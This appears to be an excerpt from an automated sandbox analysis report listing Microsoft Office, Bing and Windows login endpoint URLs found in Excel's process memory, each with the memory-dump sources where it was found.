Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net//
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v16
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.jsonJ
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/Officev
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://os
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://entitlement.diagnosticssdf.office.com=
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://entity.osi.office.net/t
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://graph.ppe.windows.net/8
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://graph.windows.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://graph.windows.net/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://hubble.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://hubble.officeapps.live.com-
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://hubble.officeapps.live.com8
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://hubble.officeapps.live.comsGraphWY
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3ds
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: EXCEL.EXE, 00000000.00000002.965446907.00000000131D8000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: EXCEL.EXE, 00000000.00000002.965446907.00000000131D8000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EXCEL.EXE, 00000000.00000002.965415330.00000000131CD000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?C
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://incidents.diagnosticssdf.office.com1
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing%
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://lifecycle.office.com(
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://lifecycle.office.coms
Source: EXCEL.EXE, 00000000.00000002.966914552.0000000015C79000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeB
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizek
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://login.windows.local
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.localtes
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize%
